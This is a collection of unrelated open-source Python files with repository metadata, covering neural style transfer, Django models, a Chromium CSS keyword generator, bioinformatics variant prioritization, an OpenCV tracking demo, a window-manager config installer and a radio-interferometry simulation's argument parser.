best_loss = float('inf')
best = None
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
if (print_iterations and print_iterations != 0):
print_progress()
for i in range(iterations):
train_step.run() ## run here
last_step = (i == iterations - 1)
if last_step or (print_iterations and i % print_iterations == 0):
print_progress()
# store output and checkpoint images
if (checkpoint_iterations and i % checkpoint_iterations == 0) or last_step:
this_loss = loss.eval()
if this_loss < best_loss:
best_loss = this_loss
best = image.eval()
img_out = unprocess(best.reshape(shape[1:]))
output_file = None
if not last_step:
if checkpoint_path:
output_file = checkpoint_path % i
else:
output_file = output_path
if output_file:
imsave(output_file, img_out)
print("finish stylizing.\n")
def _tensor_size(tensor):
from operator import mul
return reduce(mul, (d.value for d in tensor.get_shape()), 1) | {
"content_hash": "c5f70d3fe28e6561cb8965c79f61431b",
"timestamp": "",
"source": "github",
"line_count": 330,
"max_line_length": 110,
"avg_line_length": 38.68787878787879,
"alnum_prop": 0.5514999608365316,
"repo_name": "thisray/MS_Course",
"id": "46007720ae96ac36577d6eca61d4ed67bb887ade",
"size": "13713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "IA_2017_Fall/final_project/stylize_part.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "78309"
},
{
"name": "Jupyter Notebook",
"bytes": "6010677"
},
{
"name": "Python",
"bytes": "13713"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('contentcuration', '0058_auto_20170223_1636'),
]
operations = [
migrations.CreateModel(
name='ChannelResourceSize',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tree_id', models.IntegerField()),
('resource_size', models.IntegerField()),
],
options={
'db_table': 'contentcuration_channel_resource_sizes',
'managed': False,
},
),
migrations.AlterField(
model_name='formatpreset',
name='id',
field=models.CharField(choices=[('high_res_video', 'High Resolution'), ('low_res_video', 'Low Resolution'), ('vector_video', 'Vectorized'), ('video_thumbnail', 'Thumbnail'), ('video_subtitle', 'Subtitle'), ('audio', 'Audio'), ('audio_thumbnail', 'Thumbnail'), ('document', 'Document'), ('document_thumbnail', 'Thumbnail'), (
'exercise', 'Exercise'), ('exercise_thumbnail', 'Thumbnail'), ('exercise_image', 'Exercise Image'), ('exercise_graphie', 'Exercise Graphie'), ('channel_thumbnail', 'Channel Thumbnail'), ('html5_zip', 'HTML5 Zip'), ('html5_thumbnail', 'HTML5 Thumbnail')], max_length=150, primary_key=True, serialize=False),
),
]
| {
"content_hash": "0dc7a1201aa7cc73c3bd860971dfc335",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 336,
"avg_line_length": 46.96875,
"alnum_prop": 0.5914836992681304,
"repo_name": "DXCanas/content-curation",
"id": "1a1e4d6ce7f638b137db55677f5a9fe05a73c469",
"size": "1576",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "contentcuration/contentcuration/migrations/0059_auto_20170402_1504.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "173955"
},
{
"name": "Dockerfile",
"bytes": "2215"
},
{
"name": "HTML",
"bytes": "503467"
},
{
"name": "JavaScript",
"bytes": "601189"
},
{
"name": "Makefile",
"bytes": "3409"
},
{
"name": "Python",
"bytes": "813881"
},
{
"name": "Shell",
"bytes": "6970"
},
{
"name": "Smarty",
"bytes": "6584"
},
{
"name": "Vue",
"bytes": "21539"
}
],
"symlink_target": ""
} |
import os.path
import re
import subprocess
import sys
from in_file import InFile
import in_generator
import license
HEADER_TEMPLATE = """
%(license)s
#ifndef %(class_name)s_h
#define %(class_name)s_h
#include "core/css/CSSParserMode.h"
#include <string.h>
namespace WebCore {
enum CSSValueID {
%(value_keyword_enums)s
};
const int numCSSValueKeywords = %(value_keywords_count)d;
const size_t maxCSSValueKeywordLength = %(max_value_keyword_length)d;
const char* getValueName(unsigned short id);
bool isValueAllowedInMode(unsigned short id, CSSParserMode mode);
} // namespace WebCore
#endif // %(class_name)s_h
"""
GPERF_TEMPLATE = """
%%{
%(license)s
#include "config.h"
#include "%(class_name)s.h"
#include "core/platform/HashTools.h"
#include <string.h>
namespace WebCore {
const char* const valueList[] = {
"",
%(value_keyword_strings)s
0
};
%%}
%%struct-type
struct Value;
%%omit-struct-type
%%language=C++
%%readonly-tables
%%compare-strncmp
%%define class-name %(class_name)sHash
%%define lookup-function-name findValueImpl
%%define hash-function-name value_hash_function
%%define word-array-name value_word_list
%%enum
%%%%
%(value_keyword_to_enum_map)s
%%%%
const Value* findValue(register const char* str, register unsigned int len)
{
return CSSValueKeywordsHash::findValueImpl(str, len);
}
const char* getValueName(unsigned short id)
{
if (id >= numCSSValueKeywords || id <= 0)
return 0;
return valueList[id];
}
bool isValueAllowedInMode(unsigned short id, CSSParserMode mode)
{
switch (id) {
%(ua_sheet_mode_values_keywords)s
return mode == UASheetMode;
%(quirks_mode_values_keywords)s
return mode == CSSQuirksMode;
%(quirks_mode_or_ua_sheet_mode_values_keywords)s
return mode == UASheetMode || mode == CSSQuirksMode;
default:
return true;
}
}
} // namespace WebCore
"""
class CSSValueKeywordsWriter(in_generator.Writer):
class_name = "CSSValueKeywords"
defaults = {
'condition': None,
'mode': None,
}
def __init__(self, file_paths, enabled_conditions):
in_generator.Writer.__init__(self, file_paths, enabled_conditions)
self._outputs = {(self.class_name + ".h"): self.generate_header,
(self.class_name + ".cpp"): self.generate_implementation,
}
all_properties = self.in_file.name_dictionaries
self._value_keywords = filter(lambda property: not property['condition'] or property['condition'] in self._enabled_conditions, all_properties)
first_property_id = 1
for offset, property in enumerate(self._value_keywords):
property['name'] = property['name'].lower()
property['enum_name'] = self._enum_name_from_value_keyword(property['name'])
property['enum_value'] = first_property_id + offset
if property['name'].startswith('-internal-'):
assert property['mode'] is None, 'Can\'t specify mode for value keywords with the prefix "-internal-".'
property['mode'] = 'UASheet'
else:
assert property['mode'] != 'UASheet', 'UASheet mode only value keywords should have the prefix "-internal-".'
def _enum_name_from_value_keyword(self, value_keyword):
return "CSSValue" + "".join(w.capitalize() for w in value_keyword.split("-"))
def _enum_declaration(self, property):
return " %(enum_name)s = %(enum_value)s," % property
def _case_value_keyword(self, property):
return "case %(enum_name)s:" % property
def generate_header(self):
enum_enties = map(self._enum_declaration, [{'enum_name': 'CSSValueInvalid', 'enum_value': 0}] + self._value_keywords)
return HEADER_TEMPLATE % {
'license': license.license_for_generated_cpp(),
'class_name': self.class_name,
'value_keyword_enums': "\n".join(enum_enties),
'value_keywords_count': len(enum_enties),
'max_value_keyword_length': reduce(max, map(len, map(lambda property: property['name'], self._value_keywords))),
}
def _value_keywords_with_mode(self, mode):
return filter(lambda property: property['mode'] == mode, self._value_keywords)
def generate_implementation(self):
gperf_input = GPERF_TEMPLATE % {
'license': license.license_for_generated_cpp(),
'class_name': self.class_name,
'value_keyword_strings': '\n'.join(map(lambda property: ' "%(name)s",' % property, self._value_keywords)),
'value_keyword_to_enum_map': '\n'.join(map(lambda property: '%(name)s, %(enum_name)s' % property, self._value_keywords)),
'ua_sheet_mode_values_keywords': '\n'.join(map(self._case_value_keyword, self._value_keywords_with_mode('UASheet'))),
'quirks_mode_values_keywords': '\n'.join(map(self._case_value_keyword, self._value_keywords_with_mode('Quirks'))),
'quirks_mode_or_ua_sheet_mode_values_keywords': '\n'.join(map(self._case_value_keyword, self._value_keywords_with_mode('QuirksOrUASheet'))),
}
# FIXME: If we could depend on Python 2.7, we would use subprocess.check_output
gperf_args = ['gperf', '--key-positions=*', '-D', '-n', '-s', '2']
gperf = subprocess.Popen(gperf_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
return gperf.communicate(gperf_input)[0]
if __name__ == "__main__":
in_generator.Maker(CSSValueKeywordsWriter).main(sys.argv)
| {
"content_hash": "0154241c4be0156a8324cc7789d46ddd",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 152,
"avg_line_length": 34.01840490797546,
"alnum_prop": 0.6414788097385031,
"repo_name": "windyuuy/opera",
"id": "a51823c216367504627529b83d30dd9b3376b0de",
"size": "5568",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "chromium/src/third_party/WebKit/Source/core/scripts/make_css_value_keywords.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "25707"
},
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Assembly",
"bytes": "51642"
},
{
"name": "Batchfile",
"bytes": "35942"
},
{
"name": "C",
"bytes": "4303018"
},
{
"name": "C#",
"bytes": "35203"
},
{
"name": "C++",
"bytes": "207333360"
},
{
"name": "CMake",
"bytes": "25089"
},
{
"name": "CSS",
"bytes": "681256"
},
{
"name": "Dart",
"bytes": "24294"
},
{
"name": "Emacs Lisp",
"bytes": "25534"
},
{
"name": "Groff",
"bytes": "5283"
},
{
"name": "HTML",
"bytes": "10400943"
},
{
"name": "IDL",
"bytes": "836"
},
{
"name": "Java",
"bytes": "2821184"
},
{
"name": "JavaScript",
"bytes": "14563996"
},
{
"name": "Lua",
"bytes": "13749"
},
{
"name": "Makefile",
"bytes": "55521"
},
{
"name": "Objective-C",
"bytes": "1211523"
},
{
"name": "Objective-C++",
"bytes": "6221908"
},
{
"name": "PHP",
"bytes": "61320"
},
{
"name": "Perl",
"bytes": "82949"
},
{
"name": "Protocol Buffer",
"bytes": "280464"
},
{
"name": "Python",
"bytes": "12627773"
},
{
"name": "Rebol",
"bytes": "262"
},
{
"name": "Ruby",
"bytes": "937"
},
{
"name": "Scheme",
"bytes": "10604"
},
{
"name": "Shell",
"bytes": "894814"
},
{
"name": "VimL",
"bytes": "4953"
},
{
"name": "XSLT",
"bytes": "418"
},
{
"name": "nesC",
"bytes": "14650"
}
],
"symlink_target": ""
} |
from django.shortcuts import render
# Create your views here.
class AuditavelViewMixin(object,):
def form_valid(self, form, ):
if not form.instance.criado_por:
form.instance.criado_por = self.request.user
form.instance.modificado_por = self.request.user
return super(AuditavelViewMixin, self).form_valid(form)
| {
"content_hash": "c24ebe3ecc19f7f6738fa0b996f4790c",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 63,
"avg_line_length": 39,
"alnum_prop": 0.7037037037037037,
"repo_name": "luzfcb/versionamento_testes",
"id": "aafc1f02edfd570d733f3f18b3213baff900c75d",
"size": "351",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testapp/auditavel/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1281508"
},
{
"name": "HTML",
"bytes": "65116"
},
{
"name": "JavaScript",
"bytes": "1131431"
},
{
"name": "Python",
"bytes": "39292"
}
],
"symlink_target": ""
} |
"""Prioritize structural variants based on biological information.
Provides high level summaries of structural variants in regions of interest,
as defined by the input configuration. Tries to narrow structural variant calls
based on potential biological targets.
"""
import os
import pandas as pd
import toolz as tz
from bcbio import utils
from bcbio.distributed.transaction import file_transaction
from bcbio.pipeline import config_utils
from bcbio.pipeline import datadict as dd
from bcbio.provenance import do
from bcbio.variation import bedutils, vcfutils
POST_PRIOR_FNS = {}
def run(items):
assert len(items) == 1, ("Expect one input to biological prioritization: %s" %
", ".join([dd.get_sample_name(d) for d in items]))
data = items[0]
inputs = []
for call in data.get("sv", []):
vcf_file = call.get("vcf_file", call.get("vrn_file"))
if vcf_file and vcf_file.endswith((".vcf", "vcf.gz")):
pp_fn = POST_PRIOR_FNS.get(call["variantcaller"])
if pp_fn:
pp_fn = pp_fn(call)
inputs.append((call["variantcaller"], vcf_file, pp_fn))
if len(inputs) > 0:
prioritize_by = tz.get_in(["config", "algorithm", "svprioritize"], data)
if prioritize_by:
work_dir = _sv_workdir(data)
priority_files = [_prioritize_vcf(vcaller, vfile, prioritize_by, post_prior_fn, work_dir, data)
for vcaller, vfile, post_prior_fn in inputs]
priority_tsv = _combine_files([xs[0] for xs in priority_files], work_dir, data)
raw_files = {}
for svcaller, fname in zip([xs[0] for xs in inputs], [xs[1] for xs in priority_files]):
clean_fname = os.path.join(os.path.dirname(fname), "%s-%s-prioritized%s" %
(dd.get_sample_name(data), svcaller, utils.splitext_plus(fname)[-1]))
utils.symlink_plus(fname, clean_fname)
raw_files[svcaller] = clean_fname
data["sv"].append({"variantcaller": "sv-prioritize", "vrn_file": priority_tsv,
"raw_files": raw_files})
# Disabled on move to CWL, not used and tested with CNVkit changes
# data = _cnv_prioritize(data)
return [data]
def is_gene_list(bed_file):
"""Check if the file is only a list of genes, not a BED
"""
with utils.open_gzipsafe(bed_file) as in_handle:
for line in in_handle:
if not line.startswith("#"):
if len(line.split()) == 1:
return True
else:
return False
def _find_gene_list_from_bed(bed_file, base_file, data):
"""Retrieve list of gene names from input BED file.
"""
# Check for a gene list, we can just return that.
if is_gene_list(bed_file):
return bed_file
out_file = "%s-genes.txt" % utils.splitext_plus(base_file)[0]
if not os.path.exists(out_file):
genes = set([])
import pybedtools
with utils.open_gzipsafe(bed_file) as in_handle:
for r in pybedtools.BedTool(in_handle):
if r.name:
if not r.name.startswith("{"):
genes.add(r.name)
with file_transaction(data, out_file) as tx_out_file:
with open(tx_out_file, "w") as out_handle:
if len(genes) > 0:
out_handle.write("\n".join(sorted(list(genes))) + "\n")
if utils.file_exists(out_file):
return out_file
def _prioritize_vcf(caller, vcf_file, prioritize_by, post_prior_fn, work_dir, data):
"""Provide prioritized tab delimited output for a single caller.
"""
sample = dd.get_sample_name(data)
out_file = os.path.join(work_dir, "%s-%s-prioritize.tsv" % (sample, caller))
simple_vcf = os.path.join(work_dir, "%s-%s-simple.vcf.gz" % (sample, caller))
if not utils.file_exists(simple_vcf):
gene_list = _find_gene_list_from_bed(prioritize_by, out_file, data)
# If we have a standard gene list we can skip BED based prioritization
priority_vcf = "%s.vcf.gz" % utils.splitext_plus(out_file)[0]
if gene_list:
if vcf_file.endswith(".vcf.gz"):
utils.symlink_plus(vcf_file, priority_vcf)
else:
assert vcf_file.endswith(".vcf")
utils.symlink_plus(vcf_file, priority_vcf.replace(".vcf.gz", ".vcf"))
vcfutils.bgzip_and_index(priority_vcf.replace(".vcf.gz", ".vcf"),
data["config"], remove_orig=False)
# otherwise prioritize based on BED and proceed
else:
if not utils.file_exists(priority_vcf):
with file_transaction(data, priority_vcf) as tx_out_file:
resources = config_utils.get_resources("bcbio_prioritize", data["config"])
jvm_opts = resources.get("jvm_opts", ["-Xms1g", "-Xmx4g"])
jvm_opts = config_utils.adjust_opts(jvm_opts, {"algorithm": {"memory_adjust":
{"direction": "increase",
"maximum": "30000M",
"magnitude": dd.get_cores(data)}}})
jvm_opts = " ".join(jvm_opts)
export = utils.local_path_export()
cmd = ("{export} bcbio-prioritize {jvm_opts} known -i {vcf_file} -o {tx_out_file} "
" -k {prioritize_by}")
do.run(cmd.format(**locals()), "Prioritize: select in known regions of interest")
data_dir = os.path.dirname(os.path.realpath(utils.which("simple_sv_annotation.py")))
with file_transaction(data, simple_vcf) as tx_out_file:
fusion_file = os.path.join(data_dir, "fusion_pairs.txt")
opts = ""
if os.path.exists(fusion_file):
opts += " --known_fusion_pairs %s" % fusion_file
if not gene_list:
opts += " --gene_list %s" % os.path.join(data_dir, "az-cancer-panel.txt")
else:
opts += " --gene_list %s" % gene_list
cmd = "simple_sv_annotation.py {opts} -o - {priority_vcf} | bgzip -c > {tx_out_file}"
do.run(cmd.format(**locals()), "Prioritize: simplified annotation output")
simple_vcf = vcfutils.bgzip_and_index(vcfutils.sort_by_ref(simple_vcf, data), data["config"])
if post_prior_fn:
simple_vcf = post_prior_fn(simple_vcf, work_dir, data)
if not utils.file_uptodate(out_file, simple_vcf):
with file_transaction(data, out_file) as tx_out_file:
export = utils.local_path_export(env_cmd="vawk")
cmd = ("{export} zcat {simple_vcf} | vawk -v SNAME={sample} -v CALLER={caller} "
"""'{{if (($7 == "PASS" || $7 == ".") && (S${sample}$GT != "0/0")) """
"print CALLER,SNAME,$1,$2,I$END,"
"""I$SVTYPE=="BND" ? I$SVTYPE":"$3":"I$MATEID : I$SVTYPE,"""
"I$LOF,I$SIMPLE_ANN,"
"S${sample}$SR,S${sample}$PE,S${sample}$PR}}' > {tx_out_file}")
do.run(cmd.format(**locals()), "Prioritize: convert to tab delimited")
return out_file, simple_vcf
def _combine_files(tsv_files, work_dir, data):
"""Combine multiple priority tsv files into a final sorted output.
"""
header = "\t".join(["caller", "sample", "chrom", "start", "end", "svtype",
"lof", "annotation", "split_read_support", "paired_support_PE", "paired_support_PR"])
sample = dd.get_sample_name(data)
out_file = os.path.join(work_dir, "%s-prioritize.tsv" % (sample))
if not utils.file_exists(out_file):
with file_transaction(data, out_file) as tx_out_file:
tmpdir = os.path.dirname(tx_out_file)
input_files = " ".join(tsv_files)
sort_cmd = bedutils.get_sort_cmd(tmpdir)
cmd = "{{ echo '{header}'; cat {input_files} | {sort_cmd} -k3,3 -k4,4n; }} > {tx_out_file}"
do.run(cmd.format(**locals()), "Combine prioritized from multiple callers")
return out_file
def _sv_workdir(data):
return utils.safe_makedir(os.path.join(data["dirs"]["work"], "structural",
dd.get_sample_name(data), "prioritize"))
# ## CNV prioritization by genes of interest and confidence intervals
def _cnvkit_prioritize(sample, genes, allele_file, metrics_file):
"""Summarize non-diploid calls with copy numbers and confidence intervals.
"""
mdf = pd.read_csv(metrics_file, sep="\t")
mdf.columns = [x.lower() for x in mdf.columns]
if len(genes) > 0:
mdf = mdf[mdf["gene"].str.contains("|".join(genes))]
mdf = mdf[["chromosome", "start", "end", "gene", "log2", "ci_hi", "ci_lo"]]
adf = pd.read_csv(allele_file, sep="\t")
if len(genes) > 0:
adf = adf[adf["gene"].str.contains("|".join(genes))]
if "cn1" in adf.columns and "cn2" in adf.columns:
adf = adf[["chromosome", "start", "end", "cn", "cn1", "cn2"]]
else:
adf = adf[["chromosome", "start", "end", "cn"]]
df = pd.merge(mdf, adf, on=["chromosome", "start", "end"])
df = df[df["cn"] != 2]
if len(df) > 0:
def passes(row):
spread = abs(row["ci_hi"] - row["ci_lo"])
return spread < 0.25
df["passes"] = df.apply(passes, axis=1)
df.insert(0, "sample", [sample] * len(df))
return df
def _cnv_prioritize(data):
"""Perform confidence interval based prioritization for CNVs.
"""
supported = {"cnvkit": {"inputs": ["call_file", "segmetrics"], "fn": _cnvkit_prioritize}}
pcall = None
priority_files = None
for call in data.get("sv", []):
if call["variantcaller"] in supported:
priority_files = [call.get(x) for x in supported[call["variantcaller"]]["inputs"]]
priority_files = [x for x in priority_files if x is not None and utils.file_exists(x)]
if len(priority_files) == len(supported[call["variantcaller"]]["inputs"]):
pcall = call
break
prioritize_by = tz.get_in(["config", "algorithm", "svprioritize"], data)
if pcall and prioritize_by:
out_file = "%s-prioritize.tsv" % utils.splitext_plus(priority_files[0])[0]
gene_list = _find_gene_list_from_bed(prioritize_by, out_file, data)
if gene_list:
with open(gene_list) as in_handle:
genes = [x.strip() for x in in_handle]
args = [dd.get_sample_name(data), genes] + priority_files
df = supported[pcall["variantcaller"]]["fn"](*args)
with file_transaction(data, out_file) as tx_out_file:
df.to_csv(tx_out_file, sep="\t", index=False)
pcall["priority"] = out_file
return data
| {
"content_hash": "0995aa94dfe160f1cef61b84332f3f31",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 117,
"avg_line_length": 50.714285714285715,
"alnum_prop": 0.5606542480690595,
"repo_name": "lbeltrame/bcbio-nextgen",
"id": "48343fec8eccce33cf37f321416a0886121b56e4",
"size": "11005",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "bcbio/structural/prioritize.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "3620"
},
{
"name": "Lua",
"bytes": "7695"
},
{
"name": "Python",
"bytes": "2557176"
},
{
"name": "Ruby",
"bytes": "624"
},
{
"name": "Shell",
"bytes": "16730"
}
],
"symlink_target": ""
} |
'''
Camshift tracker
================
This is a demo that shows mean-shift based tracking
You select a color objects such as your face and it tracks it.
This reads from video camera (0 by default, or the camera number the user enters)
http://www.robinhewitt.com/research/track/camshift.html
Usage:
------
camshift.py [<video source>]
To initialize tracking, select the object with mouse
Keys:
-----
ESC - exit
b - toggle back-projected probability visualization
'''
# Python 2/3 compatibility
from __future__ import print_function
import sys
PY3 = sys.version_info[0] == 3
if PY3:
xrange = range
import numpy as np
import cv2
# local module
import video
from video import presets
class App(object):
def __init__(self, video_src):
self.cam = video.create_capture(video_src, presets['cube'])
ret, self.frame = self.cam.read()
cv2.namedWindow('camshift')
cv2.setMouseCallback('camshift', self.onmouse)
self.selection = None
self.drag_start = None
self.show_backproj = False
self.track_window = None
def onmouse(self, event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
self.drag_start = (x, y)
self.track_window = None
if self.drag_start:
xmin = min(x, self.drag_start[0])
ymin = min(y, self.drag_start[1])
xmax = max(x, self.drag_start[0])
ymax = max(y, self.drag_start[1])
self.selection = (xmin, ymin, xmax, ymax)
if event == cv2.EVENT_LBUTTONUP:
self.drag_start = None
self.track_window = (xmin, ymin, xmax - xmin, ymax - ymin)
def show_hist(self):
bin_count = self.hist.shape[0]
bin_w = 24
img = np.zeros((256, bin_count*bin_w, 3), np.uint8)
for i in xrange(bin_count):
h = int(self.hist[i])
cv2.rectangle(img, (i*bin_w+2, 255), ((i+1)*bin_w-2, 255-h), (int(180.0*i/bin_count), 255, 255), -1)
img = cv2.cvtColor(img, cv2.COLOR_HSV2BGR)
cv2.imshow('hist', img)
def run(self):
while True:
ret, self.frame = self.cam.read()
vis = self.frame.copy()
hsv = cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, np.array((0., 60., 32.)), np.array((180., 255., 255.)))
if self.selection:
x0, y0, x1, y1 = self.selection
hsv_roi = hsv[y0:y1, x0:x1]
mask_roi = mask[y0:y1, x0:x1]
hist = cv2.calcHist( [hsv_roi], [0], mask_roi, [16], [0, 180] )
cv2.normalize(hist, hist, 0, 255, cv2.NORM_MINMAX)
self.hist = hist.reshape(-1)
self.show_hist()
vis_roi = vis[y0:y1, x0:x1]
cv2.bitwise_not(vis_roi, vis_roi)
vis[mask == 0] = 0
if self.track_window and self.track_window[2] > 0 and self.track_window[3] > 0:
self.selection = None
prob = cv2.calcBackProject([hsv], [0], self.hist, [0, 180], 1)
prob &= mask
term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
track_box, self.track_window = cv2.CamShift(prob, self.track_window, term_crit)
if self.show_backproj:
vis[:] = prob[...,np.newaxis]
try:
cv2.ellipse(vis, track_box, (0, 0, 255), 2)
except:
print(track_box)
cv2.imshow('camshift', vis)
ch = cv2.waitKey(5)
if ch == 27:
break
if ch == ord('b'):
self.show_backproj = not self.show_backproj
cv2.destroyAllWindows()
if __name__ == '__main__':
import sys
try:
video_src = sys.argv[1]
except:
video_src = 0
print(__doc__)
App(video_src).run()
| {
"content_hash": "7e7de9bb0c48f03b6e75b2fe2a01442d",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 112,
"avg_line_length": 31.42063492063492,
"alnum_prop": 0.5352361707501895,
"repo_name": "makelove/OpenCV-Python-Tutorial",
"id": "d55c1ac76c647b95ccea2a0f1ca817dc32e72246",
"size": "3982",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "官方samples/camshift.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1015"
},
{
"name": "C++",
"bytes": "2286"
},
{
"name": "CMake",
"bytes": "238"
},
{
"name": "Python",
"bytes": "472994"
}
],
"symlink_target": ""
} |
from sanity import settings
from sanity.initializer import BaseInitializer
from sanity.settings import module_path
class Initializer(BaseInitializer):
@property
def requirements(self):
return [
"awesome",
"flameshot",
"peek",
"redshift",
"rofi",
("vicious", "awesome-extra"),
"xsel",
]
@property
def user_groups(self):
return ["video"]
def build(self):
default_wallpaper = module_path("private", "wallpapers", "10-12.jpg")
self.inject(
"dstheme.lua",
inject_map={
"DS_WALLPAPER": self.setting("DS_WALLPAPER", default_wallpaper),
"DS_WEATHER_KEY": self.setting("DS_WEATHER_KEY"),
"DS_WEATHER_CITY": self.setting("DS_WEATHER_CITY"),
},
)
self.checkout("https://github.com/xinhaoyuan/layout-machi.git", "layout-machi")
self.checkout("https://github.com/lcpz/lain.git", "lain")
def install(self):
self.link_base("rc.lua", ".config/awesome/rc.lua")
self.link_dist("dstheme.lua", ".config/awesome/dstheme.lua")
self.link_base("sanity", ".config/awesome/sanity")
self.link_dist("layout-machi", ".config/awesome/layout-machi")
self.link_dist("lain", ".config/awesome/lain")
self.run(
"""
flameshot config \
--maincolor "#{}" \
--contrastcolor "#{}" \
--showhelp false \
--trayicon false
""".format(
settings.Colors.YELLOW, settings.Colors.BACKGROUND
)
)
self.link_base("redshift.conf", ".config/redshift/redshift.conf")
| {
"content_hash": "aadc48a33149c0685b7841f352f22793",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 87,
"avg_line_length": 31.24561403508772,
"alnum_prop": 0.5334081976417743,
"repo_name": "gregflynn/dotsanity",
"id": "d341f75dca31667f9ac6e3e2c24a9f75acabb8d5",
"size": "1781",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/awesome/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Lua",
"bytes": "67603"
},
{
"name": "Python",
"bytes": "98571"
},
{
"name": "Shell",
"bytes": "20993"
},
{
"name": "Vim Script",
"bytes": "8073"
}
],
"symlink_target": ""
} |
from mpi4py import MPI
import argparse
import numpy as NP
from astropy.io import fits
from astropy.io import ascii
from astropy.coordinates import Galactic, FK5
from astropy import units
import scipy.constants as FCNST
from scipy import interpolate
import matplotlib.pyplot as PLT
import matplotlib.colors as PLTC
import matplotlib.animation as MOV
from scipy.interpolate import griddata
import datetime as DT
import time
import progressbar as PGB
import healpy as HP
import my_MPI_modules as my_MPI
import geometry as GEOM
import interferometry as RI
import catalog as SM
import constants as CNST
import my_DSP_modules as DSP
import my_operations as OPS
import primary_beams as PB
import baseline_delay_horizon as DLY
import lookup_operations as LKP
import ipdb as PDB
## Set MPI parameters
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
nproc = comm.Get_size()
name = MPI.Get_processor_name()
## Parse input arguments
parser = argparse.ArgumentParser(description='Program to simulate interferometer array data')
project_group = parser.add_mutually_exclusive_group(required=True)
project_group.add_argument('--project-MWA', dest='project_MWA', action='store_true')
project_group.add_argument('--project-LSTbin', dest='project_LSTbin', action='store_true')
project_group.add_argument('--project-HERA', dest='project_HERA', action='store_true')
project_group.add_argument('--project-beams', dest='project_beams', action='store_true')
project_group.add_argument('--project-drift-scan', dest='project_drift_scan', action='store_true')
project_group.add_argument('--project-global-EoR', dest='project_global_EoR', action='store_true')
array_config_group = parser.add_mutually_exclusive_group(required=True)
array_config_group.add_argument('--antenna-file', help='File containing antenna locations', type=file, dest='antenna_file')
array_config_group.add_argument('--array-layout', help='Identifier specifying antenna array layout', choices=['MWA-128T', 'HERA-7', 'HERA-19', 'HERA-37', 'HERA-61', 'HERA-91', 'HERA-127', 'HERA-169', 'HERA-217', 'HERA-271', 'HERA-331', 'CIRC'], type=str, dest='array_layout')
array_parms_group = parser.add_argument_group('Array Layout Parameters', 'Array Layout Specifications')
array_parms_group.add_argument('--minR', help='Minimum radius of circular antenna layout', dest='minR', type=float, default=None, nargs='?')
array_parms_group.add_argument('--maxR', help='Maximum radius of circular antenna layout', dest='maxR', type=float, default=None, nargs='?')
# parser.add_argument('--antenna-file', help='File containing antenna locations', default='/data3/t_nithyanandan/project_MWA/MWA_128T_antenna_locations_MNRAS_2012_Beardsley_et_al.txt', type=file, dest='antenna_file')
telescope_group = parser.add_argument_group('Telescope parameters', 'Telescope/interferometer specifications')
telescope_group.add_argument('--label-prefix', help='Prefix for baseline labels [str, Default = ""]', default='', type=str, dest='label_prefix')
telescope_group.add_argument('--telescope', help='Telescope name [str, default="custom"]', default='custom', type=str, dest='telescope_id', choices=['mwa', 'vla', 'gmrt', 'hera', 'mwa_dipole', 'paper_dipole', 'custom', 'mwa_tools'])
telescope_group.add_argument('--latitude', help='Latitude of interferometer array in degrees [float, Default=-26.701]', default=-26.701, type=float, dest='latitude')
telescope_group.add_argument('--A-eff', help='Effective area in m^2', type=float, dest='A_eff', nargs='?')
telescope_group.add_argument('--Tsys', help='System temperature in K [float, Default=440.0]', default=440.0, type=float, dest='Tsys')
telescope_group.add_argument('--pfb-method', help='PFB coarse channel shape computation method [str, Default="theoretical"]', dest='pfb_method', default=None, choices=['theoretical', 'empirical', None])
telescope_group.add_argument('--pfb-file', help='File containing PFB coefficients', type=file, dest='pfb_file', default=None)
antenna_element_group = parser.add_argument_group('Antenna element parameters', 'Antenna element specifications')
antenna_element_group.add_argument('--shape', help='Shape of antenna element [no default]', type=str, dest='antenna_element_shape', default=None, choices=['dish', 'dipole', 'delta'])
antenna_element_group.add_argument('--size', help='Size of dish or length of dipole (in meters) [float, no default]', default=None, type=float, dest='antenna_element_size')
antenna_element_group.add_argument('--orientation', help='Orientation of dipole or pointing direction of dish [float, (altitude azimuth) or (l m [n])]', default=None, type=float, nargs='*', dest='antenna_element_orientation')
antenna_element_group.add_argument('--ocoords', help='Coordinates of dipole orientation or dish pointing direction [str]', default=None, type=str, dest='antenna_element_orientation_coords', choices=['dircos', 'altaz'])
antenna_element_group.add_argument('--phased-array', dest='phased_array', action='store_true')
antenna_element_group.add_argument('--phased-array-file', help='Locations of antenna elements to be phased', default='/data3/t_nithyanandan/project_MWA/MWA_tile_dipole_locations.txt', type=file, dest='phased_elements_file')
